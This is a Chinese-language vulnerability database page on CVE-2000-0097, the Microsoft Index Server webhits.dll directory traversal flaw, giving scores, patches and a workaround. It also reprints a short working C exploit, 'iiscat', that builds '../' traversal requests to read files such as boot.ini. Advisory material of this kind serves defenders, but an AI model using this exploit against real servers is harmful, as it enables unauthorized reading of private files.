CVE-2000-0097
CVSS5.0
发布时间 :2000-01-26 00:00:00
修订时间 :2008-09-10 15:02:54
NMCOE    

[原文]The WebHits ISAPI filter in Microsoft Index Server allows remote attackers to read arbitrary files, aka the "Malformed Hit-Highlighting Argument" vulnerability.


[CNNVD]Microsoft Windows Index Server远程目录遍历漏洞(MS00-006)(CNNVD-200001-056)

        
        Microsoft Index Server是Windows NT 4.0可选安装包中包括的一个基于Web的搜索引擎,在Windows 2000系统中作为一个服务安装。
        Internet Information Server 4.0中一个ISAPI应用程序webhits.dll存在安全漏洞,允许攻击者突破WEB的虚拟文件系统,获得对在同一个逻辑驱动器中其它文件(如用户数据库、日志文件等任何能猜测路径名和文件名的文件)的非法访问。
        Webhits.dll动态链接库与.htw文件关联。但即使在系统中没有任何.htw文件,仍然可能有问题。检查系统是否存在这个安全问题的是输入:http://your_web_server_address/nosuchfile.htw,如果返回信息类似"format of the QUERY_STRING is invalid",那么就说明存在安全问题。
        

- CVSS (基础分值)

CVSS分值: 5 [中等(MEDIUM)]
机密性影响: PARTIAL [很可能造成信息泄露]
完整性影响: NONE [不会对系统完整性产生影响]
可用性影响: NONE [对系统可用性无影响]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

产品及版本信息(CPE)暂不可用

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0097
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2000-0097
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200001-056
(官方数据源) CNNVD

- 其它链接及资源

http://www.microsoft.com/technet/security/bulletin/ms00-006.asp
(UNKNOWN)  MS  MS00-006
http://www.securityfocus.com/bid/950
(UNKNOWN)  BID  950
http://www.osvdb.org/1210
(UNKNOWN)  OSVDB  1210

- 漏洞信息

Microsoft Windows Index Server远程目录遍历漏洞(MS00-006)
中危 输入验证
2000-01-26 00:00:00 2005-10-12 00:00:00
远程※本地  
        
        Microsoft Index Server是Windows NT 4.0可选安装包中包括的一个基于Web的搜索引擎,在Windows 2000系统中作为一个服务安装。
        Internet Information Server 4.0中一个ISAPI应用程序webhits.dll存在安全漏洞,允许攻击者突破WEB的虚拟文件系统,获得对在同一个逻辑驱动器中其它文件(如用户数据库、日志文件等任何能猜测路径名和文件名的文件)的非法访问。
        Webhits.dll动态链接库与.htw文件关联。但即使在系统中没有任何.htw文件,仍然可能有问题。检查系统是否存在这个安全问题的是输入:http://your_web_server_address/nosuchfile.htw,如果返回信息类似"format of the QUERY_STRING is invalid",那么就说明存在安全问题。
        

- 公告与补丁

        临时解决方法:
        如果您不能立刻安装补丁或者升级,CNNVD建议您采取以下措施以降低威胁:
        * 用Internet Server Manager取消webhits.dll与.htw文件的关联。
        厂商补丁:
        Microsoft
        ---------
        Microsoft已经为此发布了一个安全公告(MS00-006)以及相应补丁:
        MS00-006:Patch Available for "Malformed Hit-Highlighting Argument" Vulnerability
        链接:
        http://www.microsoft.com/technet/security/bulletin/MS00-006.asp

        补丁下载:
        Index Server 2.0:
        - Intel:
        
        http://www.microsoft.com/downloads/release.asp?ReleaseID=17727

        - Alpha:
        
        http://www.microsoft.com/downloads/release.asp?ReleaseID=17728

        Indexing Services for Windows 2000:
        - Intel:
        
        http://www.microsoft.com/downloads/release.asp?ReleaseID=17726

- 漏洞信息 (19731)

Microsoft Index Server 2.0/Indexing Services for Windows 2000 Directory Traversal (EDBID:19731)
windows remote
2000-01-26 Verified
0 fredrik.widlund
N/A [点击下载]
source: http://www.securityfocus.com/bid/950/info

Index Server 2.0 is a utility included in the NT 4.0 Option Pack. The functionality provided by Index Service has been built into Windows 2000 as Indexing Services.

When combined with IIS, Index Server and Indexing Services include the ability to view web search results in their original context. It will generate an html page showing the query terms in a short excerpt of the surrounding text for each page returned, along with a link to that page. This is known as "Hit Highlighting". To do this, it supports the .htw filetype which is handled by the webhits.dll ISAPI application. This dll will allow the use of the '../' directory traversal string in the selection of a template file. This will allow for remote, unauthenticated viewing of any file on the system whose location is known by the attacker.

The original patch released for this issue still discloses 'include' file types. 'include' files contain various data which assist in the execution of program files.

/* 
   fredrik.widlund@defcom-sec.com 
   
   example: iiscat ../../../../boot.ini
 */

#include <stdio.h>
#include <string.h>

int main(int argc, char **argv)
{
  char request[2048], *request_p, *file_read, *file_valid = "/default.htm";
  int file_buf_size = 250;
  
  if (!((argc == 2 && argv[1] && strlen(argv[1]) < 1024) || 
	(argc == 3 && argv[1] && argv[2] && strlen(argv[1]) <= file_buf_size && strlen(argv[2]) < 1024)))
    {
      fprintf(stderr, "usage: iiscat file_to_read [valid_file]\n");
      exit(1);
    }
  
  file_read = argv[1];
  if (argc == 3)
    file_valid = argv[2];

  sprintf(request, "GET %s", file_valid);
  request_p = request + strlen(request);

  file_buf_size -= strlen(file_valid);
  while(file_buf_size)
    {
      strcpy(request_p, "%20");
      request_p += 3;
      file_buf_size--;
    }

  sprintf(request_p, ".htw?CiWebHitsFile=%s&CiRestriction=none&CiHiliteType=Full HTTP/1.0\n\n", file_read);
  puts(request);

  exit(0);
}
		

- 漏洞信息

1210
Microsoft IIS WebHits.dll ISAPI Filter Traversal Arbitrary File Access
Remote / Network Access Input Manipulation
Loss of Confidentiality, Loss of Integrity
Exploit Public

- 漏洞描述

Microsoft IIS contains a flaw that allows a remote attacker to access arbitrary files outside of the web path. The issue is due to the webhits.dll library not properly sanitizing user input, specifically traversal style attacks (../../) supplied via the "CiWebHitsFile" variable. By supplying a crafted request to an htw script, it is possible to read arbitrary files on the system.

- 时间线

2000-01-27 Unknow
2000-01-27 Unknow

- 解决方案

Currently, there are no known workarounds or upgrades to correct this issue. However, Microsoft has released a patch to address this vulnerability.

- 相关参考

- 漏洞作者

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站